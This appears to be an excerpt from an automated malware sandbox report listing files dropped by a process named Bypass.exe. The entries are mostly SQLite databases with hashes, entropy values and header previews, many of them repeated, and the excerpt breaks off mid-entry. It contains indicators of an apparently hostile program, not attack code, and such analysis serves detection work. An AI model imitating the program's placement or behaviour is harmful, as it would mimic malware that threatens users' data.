                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):98304
                        Entropy (8bit):0.08235737944063153
                        Encrypted:false
                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):25
                        Entropy (8bit):4.403856189774722
                        Encrypted:false
                        SSDEEP:3:rWsX50rm6:Hgm6
                        MD5:9CB2964E3AF9B86786C378ACFEFC2611
                        SHA1:76093313F226D051DA99B579A836206856F85803
                        SHA-256:14C6B817EC4AF4C26A63DB90816120D356120F64C67F6621C239F4B524BFD65E
                        SHA-512:9EA3136856590B4769BA92861BC91AC4F87CE84839D3838E823EBCE606FF7D1321925A75F9F8BC497ABD7AAFA9DE72025E66BA7C304EF5DD33EAB692269D907D
                        Malicious:false
                        Preview:m3sNxG2QOebL4mrlQNahyHcdi
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
